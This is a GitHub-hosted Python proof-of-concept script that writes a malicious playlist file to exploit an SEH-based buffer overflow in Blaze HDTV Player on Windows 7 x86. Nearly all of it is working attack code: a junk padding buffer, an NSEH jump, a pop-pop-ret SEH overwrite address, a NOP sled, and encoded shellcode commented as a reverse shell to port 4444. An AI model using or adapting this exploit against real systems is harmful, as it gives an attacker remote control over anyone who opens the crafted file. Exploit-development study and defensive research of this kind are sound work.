-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathblazepoc-antiSEH.py
51 lines (43 loc) · 2.32 KB
/
blazepoc-antiSEH.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
# blazepoc-antiSEH.py / Win7x86 Blaze HDTV Player
#
import struct
file = 'blazed_again5.plf'
x = open(file,'w')
junk = "A" * 608
seh = struct.pack('<L', 0x6032a665) # 0x6032a665 : pop ecx # pop ecx # ret
jmp = "\xeb\x06" + "A"*2 #NSEH to JMP ESP
nops = "\x90" * 20
shellcode = "" # revshell .36:4444
shellcode += "\xb8\xb6\x89\x75\xf7\xd9\xe8\xd9\x74\x24\xf4\x5b\x33"
shellcode += "\xc9\xb1\x52\x31\x43\x12\x83\xc3\x04\x03\xf5\x87\x97"
shellcode += "\x02\x05\x7f\xd5\xed\xf5\x80\xba\x64\x10\xb1\xfa\x13"
shellcode += "\x51\xe2\xca\x50\x37\x0f\xa0\x35\xa3\x84\xc4\x91\xc4"
shellcode += "\x2d\x62\xc4\xeb\xae\xdf\x34\x6a\x2d\x22\x69\x4c\x0c"
shellcode += "\xed\x7c\x8d\x49\x10\x8c\xdf\x02\x5e\x23\xcf\x27\x2a"
shellcode += "\xf8\x64\x7b\xba\x78\x99\xcc\xbd\xa9\x0c\x46\xe4\x69"
shellcode += "\xaf\x8b\x9c\x23\xb7\xc8\x99\xfa\x4c\x3a\x55\xfd\x84"
shellcode += "\x72\x96\x52\xe9\xba\x65\xaa\x2e\x7c\x96\xd9\x46\x7e"
shellcode += "\x2b\xda\x9d\xfc\xf7\x6f\x05\xa6\x7c\xd7\xe1\x56\x50"
shellcode += "\x8e\x62\x54\x1d\xc4\x2c\x79\xa0\x09\x47\x85\x29\xac"
shellcode += "\x87\x0f\x69\x8b\x03\x4b\x29\xb2\x12\x31\x9c\xcb\x44"
shellcode += "\x9a\x41\x6e\x0f\x37\x95\x03\x52\x50\x5a\x2e\x6c\xa0"
shellcode += "\xf4\x39\x1f\x92\x5b\x92\xb7\x9e\x14\x3c\x40\xe0\x0e"
shellcode += "\xf8\xde\x1f\xb1\xf9\xf7\xdb\xe5\xa9\x6f\xcd\x85\x21"
shellcode += "\x6f\xf2\x53\xe5\x3f\x5c\x0c\x46\xef\x1c\xfc\x2e\xe5"
shellcode += "\x92\x23\x4e\x06\x79\x4c\xe5\xfd\xea\xb3\x52\xfc\xce"
shellcode += "\x5b\xa1\xfe\x1f\xc0\x2c\x18\x75\xe8\x78\xb3\xe2\x91"
shellcode += "\x20\x4f\x92\x5e\xff\x2a\x94\xd5\x0c\xcb\x5b\x1e\x78"
shellcode += "\xdf\x0c\xee\x37\xbd\x9b\xf1\xed\xa9\x40\x63\x6a\x29"
shellcode += "\x0e\x98\x25\x7e\x47\x6e\x3c\xea\x75\xc9\x96\x08\x84"
shellcode += "\x8f\xd1\x88\x53\x6c\xdf\x11\x11\xc8\xfb\x01\xef\xd1"
shellcode += "\x47\x75\xbf\x87\x11\x23\x79\x7e\xd0\x9d\xd3\x2d\xba"
shellcode += "\x49\xa5\x1d\x7d\x0f\xaa\x4b\x0b\xef\x1b\x22\x4a\x10"
shellcode += "\x93\xa2\x5a\x69\xc9\x52\xa4\xa0\x49\x72\x47\x60\xa4"
shellcode += "\x1b\xde\xe1\x05\x46\xe1\xdc\x4a\x7f\x62\xd4\x32\x84"
shellcode += "\x7a\x9d\x37\xc0\x3c\x4e\x4a\x59\xa9\x70\xf9\x5a\xf8"
payload = junk + jmp + seh + nops + shellcode
print 'pay:len: %d' % ( len(payload) )
x.write(payload)
print "file %s is ready" % ( file )
x.close()